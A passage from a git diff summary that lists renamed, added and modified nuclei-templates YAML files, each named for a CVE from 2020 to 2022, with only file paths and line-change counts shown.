=> cve-2020-25223.yaml} | 0 ...{CVE-2020-2551.yaml => cve-2020-2551.yaml} | 0 ...VE-2020-26073.yaml => cve-2020-26073.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-26876.yaml | 15 +- nuclei-templates/CVE-2020/cve-2020-28351.yaml | 36 + nuclei-templates/CVE-2020/cve-2020-35338.yaml | 33 + ...VE-2020-35713.yaml => cve-2020-35713.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-35749.yaml | 55 + ...{CVE-2020-3580.yaml => cve-2020-3580.yaml} | 0 ...VE-2020-35951.yaml => cve-2020-35951.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-36287.yaml | 36 - nuclei-templates/CVE-2020/cve-2020-36365.yaml | 31 - nuclei-templates/CVE-2020/cve-2020-5307.yaml | 35 + nuclei-templates/CVE-2020/cve-2020-7247.yaml | 44 + nuclei-templates/CVE-2020/cve-2020-7943.yaml | 51 + ...{CVE-2020-7980.yaml => cve-2020-7980.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-8515.yaml | 35 + nuclei-templates/CVE-2020/cve-2020-8644.yaml | 40 +- nuclei-templates/CVE-2020/cve-2020-8771.yaml | 55 + nuclei-templates/CVE-2020/cve-2020-8772.yaml | 86 +- ...{CVE-2020-8982.yaml => cve-2020-8982.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-9043.yaml | 34 +- ...{CVE-2020-9047.yaml => cve-2020-9047.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-9402.yaml | 31 + nuclei-templates/CVE-2020/cve-2020-9496.yaml | 44 + ...{CVE-20200924a.yaml => cve-20200924a.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-1472.yaml | 22 +- ...{cve-2021-1497.yaml => CVE-2021-1497.yaml} | 0 ...ve-2021-20038.yaml => CVE-2021-20038.yaml} | 0 ...ve-2021-20114.yaml => CVE-2021-20114.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-20150.yaml | 65 + nuclei-templates/CVE-2021/CVE-2021-20323.yaml | 27 +- nuclei-templates/CVE-2021/CVE-2021-20837.yaml | 66 +- nuclei-templates/CVE-2021/CVE-2021-21087.yaml | 27 +- nuclei-templates/CVE-2021/CVE-2021-21311.yaml | 69 + nuclei-templates/CVE-2021/CVE-2021-21345.yaml | 16 +- nuclei-templates/CVE-2021/CVE-2021-21351.yaml | 10 +- nuclei-templates/CVE-2021/CVE-2021-21402.yaml | 42 - nuclei-templates/CVE-2021/CVE-2021-21799.yaml | 12 +- nuclei-templates/CVE-2021/CVE-2021-21800.yaml | 43 - ...ve-2021-21801.yaml => CVE-2021-21801.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-21802.yaml | 12 +- ...ve-2021-21803.yaml => CVE-2021-21803.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-21805.yaml | 28 +- nuclei-templates/CVE-2021/CVE-2021-21816.yaml | 30 - ...ve-2021-21975.yaml => CVE-2021-21975.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-22054.yaml | 14 +- nuclei-templates/CVE-2021/CVE-2021-22214.yaml | 27 - nuclei-templates/CVE-2021/CVE-2021-22707.yaml | 8 +- nuclei-templates/CVE-2021/CVE-2021-22911.yaml | 21 +- nuclei-templates/CVE-2021/CVE-2021-24145.yaml | 25 +- nuclei-templates/CVE-2021/CVE-2021-24150.yaml | 24 +- nuclei-templates/CVE-2021/CVE-2021-24155.yaml | 10 +- nuclei-templates/CVE-2021/CVE-2021-24165.yaml | 26 +- nuclei-templates/CVE-2021/CVE-2021-24169.yaml | 11 +- nuclei-templates/CVE-2021/CVE-2021-24182.yaml | 41 +- nuclei-templates/CVE-2021/CVE-2021-24214.yaml | 34 +- nuclei-templates/CVE-2021/CVE-2021-24215.yaml | 8 +- nuclei-templates/CVE-2021/CVE-2021-24226.yaml | 29 - nuclei-templates/CVE-2021/CVE-2021-24227.yaml | 20 +- nuclei-templates/CVE-2021/CVE-2021-24236.yaml | 17 +- nuclei-templates/CVE-2021/CVE-2021-24239.yaml | 25 +- nuclei-templates/CVE-2021/CVE-2021-24245.yaml | 45 - ...ve-2021-24274.yaml => CVE-2021-24274.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-24284.yaml | 33 +- ...ve-2021-24285.yaml => CVE-2021-24285.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-24286.yaml | 3 - nuclei-templates/CVE-2021/CVE-2021-24287.yaml | 11 +- ...ve-2021-24291.yaml => CVE-2021-24291.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-24300.yaml | 5 - ...ve-2021-24335.yaml => CVE-2021-24335.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-24347.yaml | 10 +- nuclei-templates/CVE-2021/CVE-2021-24351.yaml | 12 +- nuclei-templates/CVE-2021/CVE-2021-24370.yaml | 55 + nuclei-templates/CVE-2021/CVE-2021-24385.yaml | 39 +- nuclei-templates/CVE-2021/CVE-2021-24409.yaml | 10 +- nuclei-templates/CVE-2021/CVE-2021-24435.yaml | 9 +- nuclei-templates/CVE-2021/CVE-2021-24436.yaml | 9 +- nuclei-templates/CVE-2021/CVE-2021-24442.yaml | 70 +- nuclei-templates/CVE-2021/CVE-2021-24452.yaml | 8 +- ...ve-2021-24472.yaml => CVE-2021-24472.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-24488.yaml | 45 - ...ve-2021-24495.yaml => CVE-2021-24495.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-24507.yaml | 79 +- nuclei-templates/CVE-2021/CVE-2021-24510.yaml | 48 - nuclei-templates/CVE-2021/CVE-2021-24554.yaml | 11 +- nuclei-templates/CVE-2021/CVE-2021-24627.yaml | 9 +- nuclei-templates/CVE-2021/CVE-2021-24647.yaml | 10 +- nuclei-templates/CVE-2021/CVE-2021-24666.yaml | 10 +- nuclei-templates/CVE-2021/CVE-2021-24731.yaml | 69 +- ...ve-2021-24750.yaml => CVE-2021-24750.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-24791.yaml | 6 +- nuclei-templates/CVE-2021/CVE-2021-24827.yaml | 20 +- nuclei-templates/CVE-2021/CVE-2021-24849.yaml | 84 +- nuclei-templates/CVE-2021/CVE-2021-24862.yaml | 11 +- nuclei-templates/CVE-2021/CVE-2021-24875.yaml | 10 +- nuclei-templates/CVE-2021/CVE-2021-24891.yaml | 14 +- nuclei-templates/CVE-2021/CVE-2021-24910.yaml | 32 + nuclei-templates/CVE-2021/CVE-2021-24915.yaml | 10 +- nuclei-templates/CVE-2021/CVE-2021-24917.yaml | 32 +- nuclei-templates/CVE-2021/CVE-2021-24926.yaml | 56 + nuclei-templates/CVE-2021/CVE-2021-24931.yaml | 10 +- nuclei-templates/CVE-2021/CVE-2021-24940.yaml | 25 +- nuclei-templates/CVE-2021/CVE-2021-24943.yaml | 71 +- nuclei-templates/CVE-2021/CVE-2021-24946.yaml | 22 +- nuclei-templates/CVE-2021/CVE-2021-24947.yaml | 56 + nuclei-templates/CVE-2021/CVE-2021-24956.yaml | 8 +- nuclei-templates/CVE-2021/CVE-2021-24970.yaml | 8 +- nuclei-templates/CVE-2021/CVE-2021-24979.yaml | 6 +- nuclei-templates/CVE-2021/CVE-2021-24991.yaml | 45 - nuclei-templates/CVE-2021/CVE-2021-25003.yaml | 40 +- nuclei-templates/CVE-2021/CVE-2021-25016.yaml | 6 +- nuclei-templates/CVE-2021/CVE-2021-25052.yaml | 44 - nuclei-templates/CVE-2021/CVE-2021-25055.yaml | 52 - nuclei-templates/CVE-2021/CVE-2021-25063.yaml | 28 +- nuclei-templates/CVE-2021/CVE-2021-25065.yaml | 8 +- nuclei-templates/CVE-2021/CVE-2021-25067.yaml | 8 +- nuclei-templates/CVE-2021/CVE-2021-25074.yaml | 42 + nuclei-templates/CVE-2021/CVE-2021-25075.yaml | 53 + nuclei-templates/CVE-2021/CVE-2021-25078.yaml | 9 +- nuclei-templates/CVE-2021/CVE-2021-25079.yaml | 6 +- nuclei-templates/CVE-2021/CVE-2021-25085.yaml | 42 - nuclei-templates/CVE-2021/CVE-2021-25099.yaml | 22 +- nuclei-templates/CVE-2021/CVE-2021-25104.yaml | 24 +- nuclei-templates/CVE-2021/CVE-2021-25111.yaml | 41 + nuclei-templates/CVE-2021/CVE-2021-25112.yaml | 49 - nuclei-templates/CVE-2021/CVE-2021-25114.yaml | 27 +- nuclei-templates/CVE-2021/CVE-2021-25118.yaml | 45 - nuclei-templates/CVE-2021/CVE-2021-25120.yaml | 50 - nuclei-templates/CVE-2021/CVE-2021-25296.yaml | 10 +- nuclei-templates/CVE-2021/CVE-2021-25297.yaml | 10 +- nuclei-templates/CVE-2021/CVE-2021-25298.yaml | 10 +- nuclei-templates/CVE-2021/CVE-2021-25299.yaml | 6 +- nuclei-templates/CVE-2021/CVE-2021-25899.yaml | 23 +- nuclei-templates/CVE-2021/CVE-2021-26085.yaml | 11 +- ...ve-2021-26086.yaml => CVE-2021-26086.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-26292.yaml | 8 +- nuclei-templates/CVE-2021/CVE-2021-26294.yaml | 15 +- nuclei-templates/CVE-2021/CVE-2021-26598.yaml | 57 - nuclei-templates/CVE-2021/CVE-2021-26702.yaml | 31 + nuclei-templates/CVE-2021/CVE-2021-26754.yaml | 41 +- nuclei-templates/CVE-2021/CVE-2021-27124.yaml | 11 +- nuclei-templates/CVE-2021/CVE-2021-27309.yaml | 44 - ...ve-2021-27310.yaml => CVE-2021-27310.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-27314.yaml | 11 +- nuclei-templates/CVE-2021/CVE-2021-27315.yaml | 11 +- nuclei-templates/CVE-2021/CVE-2021-27316.yaml | 11 +- nuclei-templates/CVE-2021/CVE-2021-27319.yaml | 11 +- nuclei-templates/CVE-2021/CVE-2021-27320.yaml | 10 +- nuclei-templates/CVE-2021/CVE-2021-27519.yaml | 45 - nuclei-templates/CVE-2021/CVE-2021-27520.yaml | 11 +- nuclei-templates/CVE-2021/CVE-2021-27670.yaml | 14 +- nuclei-templates/CVE-2021/CVE-2021-27909.yaml | 21 +- ...ve-2021-27931.yaml => CVE-2021-27931.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-28377.yaml | 30 - nuclei-templates/CVE-2021/CVE-2021-28419.yaml | 9 +- nuclei-templates/CVE-2021/CVE-2021-29006.yaml | 6 +- ...ve-2021-29484.yaml => CVE-2021-29484.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-29505.yaml | 10 +- nuclei-templates/CVE-2021/CVE-2021-3002.yaml | 39 +- ...ve-2021-30049.yaml => CVE-2021-30049.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-30128.yaml | 22 +- nuclei-templates/CVE-2021/CVE-2021-30134.yaml | 24 +- nuclei-templates/CVE-2021/CVE-2021-30175.yaml | 11 +- nuclei-templates/CVE-2021/CVE-2021-30461.yaml | 4 - nuclei-templates/CVE-2021/CVE-2021-3110.yaml | 22 +- nuclei-templates/CVE-2021/CVE-2021-31195.yaml | 32 +- ...ve-2021-31755.yaml => CVE-2021-31755.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-31800.yaml | 22 - nuclei-templates/CVE-2021/CVE-2021-31805.yaml | 3 - ...ve-2021-32618.yaml => CVE-2021-32618.yaml} | 0 ...ve-2021-32682.yaml => CVE-2021-32682.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-32789.yaml | 19 +- nuclei-templates/CVE-2021/CVE-2021-32853.yaml | 30 +- ...{cve-2021-3297.yaml => CVE-2021-3297.yaml} | 0 ...ve-2021-33044.yaml => CVE-2021-33044.yaml} | 0 ...ve-2021-33357.yaml => CVE-2021-33357.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-33690.yaml | 10 +- ...{cve-2021-3377.yaml => CVE-2021-3377.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-33851.yaml | 30 +- nuclei-templates/CVE-2021/CVE-2021-34640.yaml | 61 + nuclei-templates/CVE-2021/CVE-2021-34643.yaml | 38 +- nuclei-templates/CVE-2021/CVE-2021-35250.yaml | 10 +- nuclei-templates/CVE-2021/CVE-2021-35323.yaml | 6 +- nuclei-templates/CVE-2021/CVE-2021-35380.yaml | 20 +- nuclei-templates/CVE-2021/CVE-2021-35395.yaml | 6 +- nuclei-templates/CVE-2021/CVE-2021-35488.yaml | 21 +- nuclei-templates/CVE-2021/CVE-2021-35587.yaml | 43 - nuclei-templates/CVE-2021/CVE-2021-36356.yaml | 32 +- nuclei-templates/CVE-2021/CVE-2021-36450.yaml | 55 + ...{cve-2021-3654.yaml => CVE-2021-3654.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-36580.yaml | 10 +- ...ve-2021-36749.yaml => CVE-2021-36749.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-36873.yaml | 26 +- nuclei-templates/CVE-2021/CVE-2021-36880.yaml | 39 +- nuclei-templates/CVE-2021/CVE-2021-37304.yaml | 10 +- nuclei-templates/CVE-2021/CVE-2021-37305.yaml | 10 +- nuclei-templates/CVE-2021/CVE-2021-37416.yaml | 38 + nuclei-templates/CVE-2021/CVE-2021-37859.yaml | 5 - ...ve-2021-38751.yaml => CVE-2021-38751.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-39141.yaml | 6 +- nuclei-templates/CVE-2021/CVE-2021-39144.yaml | 17 +- nuclei-templates/CVE-2021/CVE-2021-39146.yaml | 8 +- nuclei-templates/CVE-2021/CVE-2021-39152.yaml | 8 +- nuclei-templates/CVE-2021/CVE-2021-39165.yaml | 10 +- nuclei-templates/CVE-2021/CVE-2021-39211.yaml | 38 - nuclei-templates/CVE-2021/CVE-2021-39322.yaml | 38 +- ...ve-2021-39433.yaml => CVE-2021-39433.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-40149.yaml | 9 +- nuclei-templates/CVE-2021/CVE-2021-40150.yaml | 33 + nuclei-templates/CVE-2021/CVE-2021-40323.yaml | 99 - nuclei-templates/CVE-2021/CVE-2021-40661.yaml | 22 +- nuclei-templates/CVE-2021/CVE-2021-40822.yaml | 39 +- nuclei-templates/CVE-2021/CVE-2021-40908.yaml | 10 +- nuclei-templates/CVE-2021/CVE-2021-40968.yaml | 8 +- nuclei-templates/CVE-2021/CVE-2021-40969.yaml | 8 +- nuclei-templates/CVE-2021/CVE-2021-40970.yaml | 8 +- nuclei-templates/CVE-2021/CVE-2021-40971.yaml | 8 +- nuclei-templates/CVE-2021/CVE-2021-40972.yaml | 8 +- nuclei-templates/CVE-2021/CVE-2021-40973.yaml | 8 +- nuclei-templates/CVE-2021/CVE-2021-41192.yaml | 27 +- ...ve-2021-41349.yaml => CVE-2021-41349.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-41432.yaml | 41 +- nuclei-templates/CVE-2021/CVE-2021-41460.yaml | 10 +- nuclei-templates/CVE-2021/CVE-2021-41569.yaml | 27 +- nuclei-templates/CVE-2021/CVE-2021-41691.yaml | 53 + nuclei-templates/CVE-2021/CVE-2021-41749.yaml | 8 +- nuclei-templates/CVE-2021/CVE-2021-42063.yaml | 46 - nuclei-templates/CVE-2021/CVE-2021-42071.yaml | 34 - nuclei-templates/CVE-2021/CVE-2021-42627.yaml | 23 +- nuclei-templates/CVE-2021/CVE-2021-42663.yaml | 22 +- nuclei-templates/CVE-2021/CVE-2021-42667.yaml | 24 +- nuclei-templates/CVE-2021/CVE-2021-42887.yaml | 23 +- nuclei-templates/CVE-2021/CVE-2021-43062.yaml | 42 - nuclei-templates/CVE-2021/CVE-2021-43421.yaml | 23 +- nuclei-templates/CVE-2021/CVE-2021-43510.yaml | 26 +- nuclei-templates/CVE-2021/CVE-2021-43574.yaml | 22 +- nuclei-templates/CVE-2021/CVE-2021-43725.yaml | 10 +- nuclei-templates/CVE-2021/CVE-2021-43734.yaml | 23 +- nuclei-templates/CVE-2021/CVE-2021-44077.yaml | 36 - nuclei-templates/CVE-2021/CVE-2021-44103.yaml | 14 +- nuclei-templates/CVE-2021/CVE-2021-44138.yaml | 10 +- nuclei-templates/CVE-2021/CVE-2021-44139.yaml | 8 +- nuclei-templates/CVE-2021/CVE-2021-44152.yaml | 21 +- nuclei-templates/CVE-2021/CVE-2021-44515.yaml | 39 + nuclei-templates/CVE-2021/CVE-2021-44528.yaml | 6 +- ...ve-2021-44848.yaml => CVE-2021-44848.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-45380.yaml | 25 +- nuclei-templates/CVE-2021/CVE-2021-45382.yaml | 10 +- nuclei-templates/CVE-2021/CVE-2021-45422.yaml | 21 +- nuclei-templates/CVE-2021/CVE-2021-45428.yaml | 48 - nuclei-templates/CVE-2021/CVE-2021-46068.yaml | 28 +- nuclei-templates/CVE-2021/CVE-2021-46069.yaml | 26 +- nuclei-templates/CVE-2021/CVE-2021-46071.yaml | 26 +- nuclei-templates/CVE-2021/CVE-2021-46072.yaml | 28 +- nuclei-templates/CVE-2021/CVE-2021-46073.yaml | 27 +- nuclei-templates/CVE-2021/CVE-2021-46107.yaml | 12 +- nuclei-templates/CVE-2021/CVE-2021-46379.yaml | 33 - nuclei-templates/CVE-2021/CVE-2021-46381.yaml | 29 - nuclei-templates/CVE-2021/CVE-2021-46418.yaml | 50 + nuclei-templates/CVE-2021/CVE-2021-46419.yaml | 52 + nuclei-templates/CVE-2021/CVE-2021-46422.yaml | 45 - nuclei-templates/CVE-2021/CVE-2021-46424.yaml | 7 +- nuclei-templates/CVE-2021/CVE-2021-46704.yaml | 10 +- ...VE-2021-20031.yaml => cve-2021-20031.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-20123.yaml | 30 +- ...VE-2021-20124.yaml => cve-2021-20124.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-20137.yaml | 33 +- nuclei-templates/CVE-2021/cve-2021-20150.yaml | 56 - nuclei-templates/CVE-2021/cve-2021-20158.yaml | 35 +- ...VE-2021-20167.yaml => cve-2021-20167.yaml} | 0 ...VE-2021-20792.yaml => cve-2021-20792.yaml} | 0 ...VE-2021-21307.yaml => cve-2021-21307.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-21311.yaml | 34 - nuclei-templates/CVE-2021/cve-2021-21402.yaml | 36 + nuclei-templates/CVE-2021/cve-2021-21745.yaml | 21 +- nuclei-templates/CVE-2021/cve-2021-21800.yaml | 53 + nuclei-templates/CVE-2021/cve-2021-21816.yaml | 33 + ...VE-2021-21973.yaml => cve-2021-21973.yaml} | 0 ...VE-2021-21978.yaml => cve-2021-21978.yaml} | 0 ...VE-2021-22053.yaml => cve-2021-22053.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-22214.yaml | 33 + nuclei-templates/CVE-2021/cve-2021-22502.yaml | 59 +- nuclei-templates/CVE-2021/cve-2021-24226.yaml | 33 + ...VE-2021-24235.yaml => cve-2021-24235.yaml} | 0 ...VE-2021-24237.yaml => cve-2021-24237.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-24245.yaml | 73 + ...VE-2021-24288.yaml => cve-2021-24288.yaml} | 0 ...VE-2021-24298.yaml => cve-2021-24298.yaml} | 0 ...VE-2021-24316.yaml => cve-2021-24316.yaml} | 0 ...VE-2021-24320.yaml => cve-2021-24320.yaml} | 0 ...VE-2021-24340.yaml => cve-2021-24340.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-24370.yaml | 44 - ...VE-2021-24389.yaml => cve-2021-24389.yaml} | 0 ...VE-2021-24406.yaml => cve-2021-24406.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-24488.yaml | 58 + nuclei-templates/CVE-2021/cve-2021-24510.yaml | 60 + ...VE-2021-24746.yaml => cve-2021-24746.yaml} | 0 ...VE-2021-24762.yaml => cve-2021-24762.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-24910.yaml | 45 - nuclei-templates/CVE-2021/cve-2021-24926.yaml | 43 - nuclei-templates/CVE-2021/cve-2021-24947.yaml | 41 - ...VE-2021-24987.yaml => cve-2021-24987.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-24991.yaml | 58 + nuclei-templates/CVE-2021/cve-2021-25008.yaml | 24 +- nuclei-templates/CVE-2021/cve-2021-25033.yaml | 22 +- nuclei-templates/CVE-2021/cve-2021-25052.yaml | 58 + nuclei-templates/CVE-2021/cve-2021-25055.yaml | 62 + nuclei-templates/CVE-2021/cve-2021-25074.yaml | 25 - nuclei-templates/CVE-2021/cve-2021-25075.yaml | 63 - nuclei-templates/CVE-2021/cve-2021-25085.yaml | 54 + nuclei-templates/CVE-2021/cve-2021-25111.yaml | 29 - nuclei-templates/CVE-2021/cve-2021-25112.yaml | 62 + nuclei-templates/CVE-2021/cve-2021-25118.yaml | 58 + nuclei-templates/CVE-2021/cve-2021-25120.yaml | 60 + ...VE-2021-25281.yaml => cve-2021-25281.yaml} | 0 ...VE-2021-25646.yaml => cve-2021-25646.yaml} | 0 ...VE-2021-26247.yaml => cve-2021-26247.yaml} | 0 ...VE-2021-26475.yaml => cve-2021-26475.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-26598.yaml | 66 + nuclei-templates/CVE-2021/cve-2021-26702.yaml | 39 - nuclei-templates/CVE-2021/cve-2021-27309.yaml | 53 + nuclei-templates/CVE-2021/cve-2021-27519.yaml | 55 + ...VE-2021-27561.yaml => cve-2021-27561.yaml} | 0 ...VE-2021-27748.yaml => cve-2021-27748.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-28377.yaml | 45 + ...VE-2021-29203.yaml => cve-2021-29203.yaml} | 0 ...VE-2021-29490.yaml => cve-2021-29490.yaml} | 0 ...VE-2021-29622.yaml => cve-2021-29622.yaml} | 0 ...{CVE-2021-3019.yaml => cve-2021-3019.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-31800.yaml | 23 + ...{CVE-2021-3223.yaml => cve-2021-3223.yaml} | 0 ...VE-2021-32305.yaml => cve-2021-32305.yaml} | 0 ...VE-2021-32819.yaml => cve-2021-32819.yaml} | 0 ...VE-2021-33544.yaml => cve-2021-33544.yaml} | 0 ...VE-2021-33564.yaml => cve-2021-33564.yaml} | 0 ...{CVE-2021-3374.yaml => cve-2021-3374.yaml} | 0 ...VE-2021-33904.yaml => cve-2021-33904.yaml} | 0 ...VE-2021-34370.yaml => cve-2021-34370.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-34640.yaml | 48 - ...VE-2021-34805.yaml => cve-2021-34805.yaml} | 0 ...VE-2021-35265.yaml => cve-2021-35265.yaml} | 0 ...VE-2021-35464.yaml => cve-2021-35464.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-35587.yaml | 59 + ...VE-2021-36260.yaml => cve-2021-36260.yaml} | 0 ...VE-2021-36380.yaml => cve-2021-36380.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-36450.yaml | 65 - ...VE-2021-37216.yaml => cve-2021-37216.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-37416.yaml | 45 - ...VE-2021-37538.yaml => cve-2021-37538.yaml} | 0 ...VE-2021-37589.yaml => cve-2021-37589.yaml} | 0 ...VE-2021-37704.yaml => cve-2021-37704.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-39211.yaml | 48 + ...VE-2021-39226.yaml => cve-2021-39226.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-39312.yaml | 20 +- ...VE-2021-39320.yaml => cve-2021-39320.yaml} | 0 ...VE-2021-39327.yaml => cve-2021-39327.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-40150.yaml | 42 - nuclei-templates/CVE-2021/cve-2021-40323.yaml | 109 + ...VE-2021-40438.yaml => cve-2021-40438.yaml} | 0 ...VE-2021-40859.yaml => cve-2021-40859.yaml} | 0 ...VE-2021-40870.yaml => cve-2021-40870.yaml} | 0 ...VE-2021-41277.yaml => cve-2021-41277.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-41282.yaml | 49 +- ...VE-2021-41293.yaml => cve-2021-41293.yaml} | 0 ...VE-2021-41649.yaml => cve-2021-41649.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-41691.yaml | 51 - nuclei-templates/CVE-2021/cve-2021-41773.yaml | 47 + ...VE-2021-41826.yaml => cve-2021-41826.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-4191.yaml | 24 +- nuclei-templates/CVE-2021/cve-2021-42063.yaml | 57 + nuclei-templates/CVE-2021/cve-2021-42071.yaml | 49 + ...VE-2021-42192.yaml => cve-2021-42192.yaml} | 0 ...VE-2021-42258.yaml => cve-2021-42258.yaml} | 0 ...VE-2021-42551.yaml => cve-2021-42551.yaml} | 0 ...VE-2021-42565.yaml => cve-2021-42565.yaml} | 0 ...VE-2021-42566.yaml => cve-2021-42566.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-43062.yaml | 54 + nuclei-templates/CVE-2021/cve-2021-44077.yaml | 46 + nuclei-templates/CVE-2021/cve-2021-44515.yaml | 44 - ...VE-2021-45043.yaml => cve-2021-45043.yaml} | 0 ...VE-2021-45232.yaml => cve-2021-45232.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-45428.yaml | 56 + nuclei-templates/CVE-2021/cve-2021-45967.yaml | 29 +- ...VE-2021-46005.yaml => cve-2021-46005.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-46379.yaml | 43 + nuclei-templates/CVE-2021/cve-2021-46381.yaml | 43 + ...VE-2021-46387.yaml => cve-2021-46387.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-46417.yaml | 20 +- nuclei-templates/CVE-2021/cve-2021-46422.yaml | 54 + nuclei-templates/CVE-2022/CVE-2022-0140.yaml | 43 - nuclei-templates/CVE-2022/CVE-2022-0147.yaml | 25 +- nuclei-templates/CVE-2022/CVE-2022-0148.yaml | 48 - nuclei-templates/CVE-2022/CVE-2022-0149.yaml | 62 + nuclei-templates/CVE-2022/CVE-2022-0150.yaml | 21 +- nuclei-templates/CVE-2022/CVE-2022-0165.yaml | 26 + nuclei-templates/CVE-2022/CVE-2022-0169.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-0189.yaml | 30 +- nuclei-templates/CVE-2022/CVE-2022-0206.yaml | 9 +- nuclei-templates/CVE-2022/CVE-2022-0212.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-0220.yaml | 27 +- nuclei-templates/CVE-2022/CVE-2022-0228.yaml | 9 +- nuclei-templates/CVE-2022/CVE-2022-0234.yaml | 21 +- nuclei-templates/CVE-2022/CVE-2022-0271.yaml | 32 - nuclei-templates/CVE-2022/CVE-2022-0281.yaml | 38 - nuclei-templates/CVE-2022/CVE-2022-0288.yaml | 42 +- nuclei-templates/CVE-2022/CVE-2022-0342.yaml | 35 +- nuclei-templates/CVE-2022/CVE-2022-0349.yaml | 22 +- nuclei-templates/CVE-2022/CVE-2022-0381.yaml | 69 + nuclei-templates/CVE-2022/CVE-2022-0412.yaml | 28 +- nuclei-templates/CVE-2022/CVE-2022-0415.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-0422.yaml | 41 + nuclei-templates/CVE-2022/CVE-2022-0434.yaml | 23 +- nuclei-templates/CVE-2022/CVE-2022-0437.yaml | 51 - nuclei-templates/CVE-2022/CVE-2022-0441.yaml | 56 +- nuclei-templates/CVE-2022/CVE-2022-0482.yaml | 54 +- nuclei-templates/CVE-2022/CVE-2022-0513.yaml | 39 +- nuclei-templates/CVE-2022/CVE-2022-0533.yaml | 6 +- nuclei-templates/CVE-2022/CVE-2022-0535.yaml | 30 +- nuclei-templates/CVE-2022/CVE-2022-0543.yaml | 4 - nuclei-templates/CVE-2022/CVE-2022-0594.yaml | 45 - nuclei-templates/CVE-2022/CVE-2022-0597.yaml | 6 +- nuclei-templates/CVE-2022/CVE-2022-0599.yaml | 41 + nuclei-templates/CVE-2022/CVE-2022-0651.yaml | 7 +- nuclei-templates/CVE-2022/CVE-2022-0653.yaml | 37 - nuclei-templates/CVE-2022/CVE-2022-0656.yaml | 44 - nuclei-templates/CVE-2022/CVE-2022-0658.yaml | 9 +- nuclei-templates/CVE-2022/CVE-2022-0678.yaml | 24 +- nuclei-templates/CVE-2022/CVE-2022-0679.yaml | 23 +- nuclei-templates/CVE-2022/CVE-2022-0692.yaml | 31 +- nuclei-templates/CVE-2022/CVE-2022-0693.yaml | 12 +- nuclei-templates/CVE-2022/CVE-2022-0735.yaml | 19 +- nuclei-templates/CVE-2022/CVE-2022-0747.yaml | 11 +- nuclei-templates/CVE-2022/CVE-2022-0760.yaml | 11 +- nuclei-templates/CVE-2022/CVE-2022-0769.yaml | 12 +- nuclei-templates/CVE-2022/CVE-2022-0773.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-0776.yaml | 17 +- nuclei-templates/CVE-2022/CVE-2022-0781.yaml | 23 +- nuclei-templates/CVE-2022/CVE-2022-0784.yaml | 22 +- nuclei-templates/CVE-2022/CVE-2022-0785.yaml | 22 +- nuclei-templates/CVE-2022/CVE-2022-0786.yaml | 22 +- nuclei-templates/CVE-2022/CVE-2022-0787.yaml | 9 +- nuclei-templates/CVE-2022/CVE-2022-0788.yaml | 22 +- nuclei-templates/CVE-2022/CVE-2022-0814.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-0817.yaml | 23 +- nuclei-templates/CVE-2022/CVE-2022-0824.yaml | 41 +- nuclei-templates/CVE-2022/CVE-2022-0826.yaml | 19 +- nuclei-templates/CVE-2022/CVE-2022-0827.yaml | 12 +- nuclei-templates/CVE-2022/CVE-2022-0846.yaml | 12 +- nuclei-templates/CVE-2022/CVE-2022-0864.yaml | 9 +- nuclei-templates/CVE-2022/CVE-2022-0867.yaml | 24 +- nuclei-templates/CVE-2022/CVE-2022-0869.yaml | 8 +- 